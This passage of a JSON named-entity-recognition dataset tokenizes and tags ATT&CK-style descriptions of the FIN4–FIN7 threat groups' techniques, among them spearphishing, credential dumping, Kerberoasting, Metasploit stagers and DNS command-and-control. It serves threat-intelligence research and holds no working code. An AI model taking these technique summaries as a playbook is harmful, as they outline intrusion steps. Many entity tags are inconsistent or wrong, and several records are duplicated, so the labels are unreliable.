"Tor", - "to", - "log", - "in", - "to", - "victims'", - "email", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "accessed", - "and", - "hijacked", - "online", - "email", - "communications", - "using", - "stolen", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "used", - "spearphishing", - "emails", - "containing", - "attachments", - "(which", - "are", - "often", - "stolen,", - "legitimate", - "documents", - "sent", - "from", - "compromised", - "accounts)", - "with", - "embedded", - "malicious", - "macros." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "used", - "spearphishing", - "emails", - "(often", - "sent", - "from", - "compromised", - "accounts)", - "containing", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "used", - "legitimate", - "credentials", - "to", - "hijack", - "email", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "used", - "VBA", - "macros", - "to", - "display", - "a", - "dialog", - "box", - "and", - "collect", - "victim", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "used", - "HTTP", - "POST", - "requests", - "to", - "transmit", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN5", - "scans", - "processes", - "on", - "all", - "victim", - "systems", - "in", - "the", - "environment", - "and", - "uses", - "automated", - "scripts", - "to", - "pull", - "back", - "the", - "results." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN5", - "has", - "has", - "used", - "the", - "tool", - "GET2", - "Penetrator", - "to", - "look", - "for", - "remote", - "login", - "and", - "hard-coded", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN5", - "has", - "cleared", - "event", - "logs", - "from", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN5", - "scans", - "processes", - "on", - "all", - "victim", - "systems", - "in", - "the", - "environment", - "and", - "uses", - "automated", - "scripts", - "to", - "pull", - "back", - "the", - "results." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN5", - "maintains", - "access", - "to", - "victim", - "environments", - "by", - "using", - "FLIPSIDE", - "to", - "create", - "a", - "proxy", - "for", - "a", - "backup", - "RDP", - "tunnel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "FIN5", - "has", - "used", - "legitimate", - "VPN,", - "Citrix,", - "or", - "VNC", - "credentials", - "to", - "maintain", - "access", - "to", - "a", - "victim", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN5", - "uses", - "SDelete", - "to", - "clean", - "up", - "the", - "environment", - "and", - "attempt", - "to", - "prevent", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN5", - "scripts", - "save", - "memory", - "dump", - "data", - "into", - "a", - "specific", - "directory", - "on", - "hosts", - "in", - "the", - "victim", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN5", - "has", - "used", - "the", - "open", - "source", - "tool", - "Essential", - "NetTools", - "to", - "map", - "the", - "network", - "and", - "build", - "a", - "list", - "of", - "targets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN5", - "has", - "obtained", - "and", - "used", - "a", - "customized", - "version", - "of", - "PsExec,", - "as", - "well", - "as", - "use", - "other", - "tools", - "such", - "as", - "pwdump,", - "SDelete,", - "and", - "Windows", - "Credential", - "Editor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "FIN5", - "has", - "used", - "legitimate", - "VPN,", - "RDP,", - "Citrix,", - "or", - "VNC", - "credentials", - "to", - "maintain", - "access", - "to", - "a", - "victim", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "has", - "used", - "Metasploit’s", - "named-pipe", - "impersonation", - "technique", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Following", - "data", - "collection,", - "FIN6", - "has", - "compressed", - "log", - "files", - "into", - "a", - "ZIP", - "archive", - "prior", - "to", - "staging", - "and", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "encoded", - "data", - "gathered", - "from", - "the", - "victim", - "with", - "a", - "simple", - "substitution", - "cipher", - "and", - "single-byte", - "XOR", - "using", - "the", - "0xAA", - "key,", - "and", - "Base64", - "with", - "character", - "permutation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "used", - "the", - "Plink", - "command-line", - "utility", - "to", - "create", - "SSH", - "tunnels", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "a", - "script", - "to", - "iterate", - "through", - "a", - "list", - "of", - "compromised", - "PoS", - "systems,", - "copy", - "and", - "remove", - "data", - "to", - "a", - "log", - "file,", - "and", - "to", - "bind", - "to", - "events", - "from", - "the", - "submit", - "payment", - "button." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "Comodo", - "code-signing", - "certificates." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "encoded", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "scripting", - "to", - "iterate", - "through", - "a", - "list", - "of", - "compromised", - "PoS", - "systems,", - "copy", - "data", - "to", - "a", - "log", - "file,", - "and", - "remove", - "the", - "original", - "data", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "the", - "Stealer", - "One", - "credential", - "stealer", - "to", - "target", - "e-mail", - "and", - "file", - "transfer", - "utilities", - "including", - "FTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Org", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "the", - "Stealer", - "One", - "credential", - "stealer", - "to", - "target", - "web", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "collected", - "schemas", - "and", - "user", - "accounts", - "from", - "systems", - "running", - "SQL", - "Server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "collected", - "and", - "exfiltrated", - "payment", - "card", - "data", - "from", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Purp", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "deployed", - "a", - "utility", - "script", - "named", - "<code>kill.bat</code>", - "to", - "disable", - "anti-virus." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "Metasploit’s", - "PsExec", - "NTDSGRAB", - "module", - "to", - "obtain", - "a", - "copy", - "of", - "the", - "victim's", - "Active", - "Directory", - "database." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "sent", - "stolen", - "payment", - "card", - "data", - "to", - "remote", - "servers", - "via", - "HTTP", - "POSTs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "tools", - "to", - "exploit", - "Windows", - "vulnerabilities", - "in", - "order", - "to", - "escalate", - "privileges.", - "The", - "tools", - "targeted", - "CVE-2013-3660,", - "CVE-2011-2005,", - "and", - "CVE-2010-4398,", - "all", - "of", - "which", - "could", - "allow", - "local", - "users", - "to", - "access", - "kernel-level", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "removed", - "files", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "malicious", - "JavaScript", - "to", - "steal", - "payment", - "card", - "data", - "from", - "e-commerce", - "sites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "Windows", - "Credential", - "Editor", - "for", - "credential", - "dumping." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "malicious", - "documents", - "to", - "lure", - "victims", - "into", - "allowing", - "execution", - "of", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "renamed", - "the", - "\"psexec\"", - "service", - "name", - "to", - "\"mstdc\"", - "to", - "masquerade", - "as", - "a", - "legitimate", - "Windows", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "Metasploit’s", - "PsExec", - "NTDSGRAB", - "module", - "to", - "obtain", - "a", - "copy", - "of", - "the", - "victim's", - "Active", - "Directory", - "database." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "used", - "publicly", - "available", - "tools", - "(including", - "Microsoft's", - "built-in", - "SQL", - "querying", - "tool,", - "osql.exe)", - "to", - "map", - "the", - "internal", - "network", - "and", - "conduct", - "reconnaissance", - "against", - "Active", - "Directory,", - "Structured", - "Query", - "Language", - "(SQL)", - "servers,", - "and", - "NetBIOS." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "Metasploit", - "Bind", - "and", - "Reverse", - "TCP", - "stagers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "extracted", - "password", - "hashes", - "from", - "ntds.dit", - "to", - "crack", - "offline." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "PowerShell", - "to", - "gain", - "access", - "to", - "merchant's", - "networks,", - "and", - "a", - "Metasploit", - "PowerShell", - "module", - "to", - "download", - "and", - "execute", - "shellcode", - "and", - "to", - "set", - "up", - "a", - "local", - "listener." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "O", - "B-Purp", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "used", - "the", - "Plink", - "command-line", - "utility", - "to", - "create", - "SSH", - "tunnels", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "Registry", - "Run", - "keys", - "to", - "establish", - "persistence", - "for", - "its", - "downloader", - "tools", - "known", - "as", - "HARDTACK", - "and", - "SHIPBREAD." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "FIN6", - "actors", - "have", - "compressed", - "data", - "from", - "remote", - "systems", - "and", - "moved", - "it", - "to", - "another", - "staging", - "system", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "used", - "RDP", - "to", - "move", - "laterally", - "in", - "victim", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "used", - "publicly", - "available", - "tools", - "(including", - "Microsoft's", - "built-in", - "SQL", - "querying", - "tool,", - "osql.exe)", - "to", - "map", - "the", - "internal", - "network", - "and", - "conduct", - "reconnaissance", - "against", - "Active", - "Directory,", - "Structured", - "Query", - "Language", - "(SQL)", - "servers,", - "and", - "NetBIOS." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "scheduled", - "tasks", - "to", - "establish", - "persistence", - "for", - "various", - "malware", - "it", - "uses,", - "including", - "downloaders", - "known", - "as", - "HARDTACK", - "and", - "SHIPBREAD", - "and", - "FrameworkPOS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "created", - "Windows", - "services", - "to", - "execute", - "encoded", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "targeted", - "victims", - "with", - "e-mails", - "containing", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "fake", - "job", - "advertisements", - "sent", - "via", - "LinkedIn", - "to", - "spearphish", - "targets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Mimikatz,", - "Cobalt", - "Strike,", - "and", - "AdFind." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "To", - "move", - "laterally", - "on", - "a", - "victim", - "network,", - "FIN6", - "has", - "used", - "credentials", - "stolen", - "from", - "various", - "systems", - "on", - "which", - "it", - "gathered", - "usernames", - "and", - "password", - "hashes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "Pastebin", - "and", - "Google", - "Storage", - "to", - "host", - "content", - "for", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "<code>kill.bat</code>", - "script", - "to", - "disable", - "security", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN6", - "has", - "used", - "WMI", - "to", - "automate", - "the", - "remote", - "execution", - "of", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "application", - "shim", - "databases", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "used", - "legitimate", - "services", - "like", - "Google", - "Docs,", - "Google", - "Scripts,", - "and", - "Pastebin", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "random", - "junk", - "code", - "to", - "obfuscate", - "malware", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "signed", - "Carbanak", - "payloads", - "with", - "legally", - "purchased", - "code", - "signing", - "certificates.", - "FIN7", - "has", - "also", - "digitally", - "signed", - "their", - "phishing", - "documents,", - "backdoors", - "and", - "other", - "staging", - "tools", - "to", - "bypass", - "security", - "controls." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "fragmented", - "strings,", - "environment", - "variables,", - "standard", - "input", - "(stdin),", - "and", - "native", - "character-replacement", - "functionalities", - "to", - "obfuscate", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "I-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "used", - "SQL", - "scripts", - "to", - "help", - "perform", - "tasks", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "gained", - "initial", - "access", - "by", - "compromising", - "a", - "victim's", - "software", - "supply", - "chain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "performed", - "C2", - "using", - "DNS", - "via", - "A,", - "OPT,", - "and", - "TXT", - "records." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "encrypted", - "virtual", - "disk", - "volumes", - "on", - "ESXi", - "servers", - "using", - "a", - "version", - "of", - "Darkside", - "ransomware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "collected", - "files", - "and", - "other", - "sensitive", - "information", - "from", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "the", - "command", - "`net", - "group", - "\"domain", - "admins\"", - "/domain`", - "to", - "enumerate", - "domain", - "groups." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "registered", - "look-alike", - "domains", - "for", - "use", - "in", - "phishing", - "campaigns." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "compromised", - "a", - "digital", - "product", - "website", - "and", - "modified", - "multiple", - "download", - "links", - "to", - "point", - "to", - "trojanized", - "versions", - "of", - "offered", - "digital", - "products." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "spear", - "phishing", - "campaigns", - "have", - "included", - "malicious", - "Word", - "documents", - "with", - "DDE", - "execution." - ], - "ner_tags": [ - "B-Idus", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "exfiltrated", - "stolen", - "data", - "to", - "the", - "MEGA", - "file", - "sharing", - "site." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "compromised", - "targeted", - "organizations", - "through", - "exploitation", - "of", - "CVE-2021-31207", - "in", - "Exchange." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "exploited", - "ZeroLogon", - "(CVE-2020-1472)", - "against", - "vulnerable", - "domain", - "controllers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7's", - "Harpy", - "backdoor", - "malware", - "can", - "use", - "DNS", - "as", - "a", - "backup", - "channel", - "for", - "C2", - "if", - "HTTP", - "fails." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "downloaded", - "additional", - "malware", - "to", - "execute", - "on", - "the", - "victim's", - "machine,", - "including", - "by", - "using", - "a", - "PowerShell", - "script", - "to", - "launch", - "shellcode", - "that", - "retrieves", - "an", - "additional", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "used", - "JavaScript", - "scripts", - "to", - "help", - "perform", - "tasks", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "Kerberoasting", - "PowerShell", - "commands", - "such", - "as,", - "`Invoke-Kerberoast`", - "for", - "credential", - "access", - "and", - "to", - "enable", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "compromised", - "credentials", - "for", - "access", - "as", - "SYSTEM", - "on", - "Exchange", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "lured", - "victims", - "to", - "double-click", - "on", - "images", - "in", - "the", - "attachments", - "they", - "sent", - "which", - "would", - "then", - "execute", - "the", - "hidden", - "LNK", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "malicious", - "links", - "to", - "lure", - "victims", - "into", - "downloading", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "developed", - "malware", - "for", - "use", - "in", - "operations,", - "including", - "the", - "creation", - "of", - "infected", - "removable", - "media." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "created", - "a", - "scheduled", - "task", - "named", - "“AdobeFlashSync”", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "attempted", - "to", - "run", - 